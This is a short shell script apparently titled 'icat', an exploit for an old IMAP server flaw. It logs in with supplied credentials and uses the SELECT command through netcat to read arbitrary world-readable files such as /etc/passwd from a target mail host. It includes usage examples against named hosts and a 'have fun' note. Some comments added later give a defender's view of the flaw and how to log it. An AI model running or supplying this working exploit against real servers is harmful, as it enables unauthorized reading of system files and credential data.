#!/bin/sh
#
# icat by Jimmy J
#
# Required: 
#  nc (netcat) ftp://ftp.avian.org/src/hacks/nc110.tgz
#
# Example:
#  icat joe@imap.ftech.net passwd /etc/hosts.allow
#  icat bob@mailhost.cerbernet.co.uk banana1 /etc/passwd 640128
#
# Problem:
# Part of the whole point of imap is to let users manage their own separate
# folders on a mail host server.  The SELECT feature does not restrict
# the user to their own files.
#
# Impact:
# An attacker with imap access can help himself to world readable files.
#
# Notes:
#
# This is useful for machines where you have a pop3 login only for example.
#
# By default imapd does not appear to log which files are being opened.
#
# Have fun with this one.
#

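# Print the command synopsis on stderr and terminate the script with status 1.
# Takes no arguments; reads $0 for the program name.
usage() {
	# ${0##*/} strips the directory part without spawning basename and, unlike
	# an unquoted `basename $0`, still works when the script path has spaces.
	printf 'Usage: %s <user@mail.victim.com> <password> [file] [bytes]\n' "${0##*/}" 1>&2
	exit 1
}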

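# Main: parse <user@host> <password> [file] [bytes], then pipe one scripted
# IMAP session (LOGIN, SELECT, PARTIAL, LOGOUT) to port 143 through nc.
#
# Review notes (defender's view):
#  - The password arrives in argv and is sent with a plain LOGIN over nc to
#    port 143, so it is exposed in the local process list and on the wire.
#  - The header's "Problem" section attributes the file read to SELECT not
#    confining the user to their own files; that has to be fixed in imapd
#    (mailbox names restricted to the user's own mail hierarchy), not here.
#  - The header also notes that imapd does not appear to log opened files by
#    default, so spotting this server-side needs the SELECT argument logged.
case "$1" in
*@*)
	# Split the first argument on '@': field 1 is the login, field 2 the host.
	luser=$(printf '%s\n' "$1" | cut -f1 -d @)
	victim=$(printf '%s\n' "$1" | cut -f2 -d @)
	passwd=$2
	# Optional arguments fall back to the original defaults when unset or empty.
	file=${3:-/etc/hosts.allow}
	bytes=${4:-32768}

	# Quoted test: the unquoted form only worked by accident on empty values
	# and errored out on values containing whitespace.
	if [ -z "$passwd" ]; then
		usage
	fi

	# An empty host, or one starting with '-', would be taken by nc as a
	# missing argument or an option rather than as a hostname.
	case "$victim" in
	'' | -*) usage ;;
	esac

	printf 'Trying %s:143... [%s] [%s]\n' "$victim" "$file" "$bytes"
	# printf with %s keeps backslashes in the arguments literal; some sh
	# implementations of echo would interpret them. The trailing blank line
	# of the original payload is preserved.
	printf 'A00001 LOGIN %s %s\nA00002 SELECT %s\nA00003 PARTIAL 1 RFC822.TEXT 1 %s\nA00004 LOGOUT\n\n' \
		"$luser" "$passwd" "$file" "$bytes" |
		nc -v "$victim" 143
	;;
*)
	usage
	;;
esac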

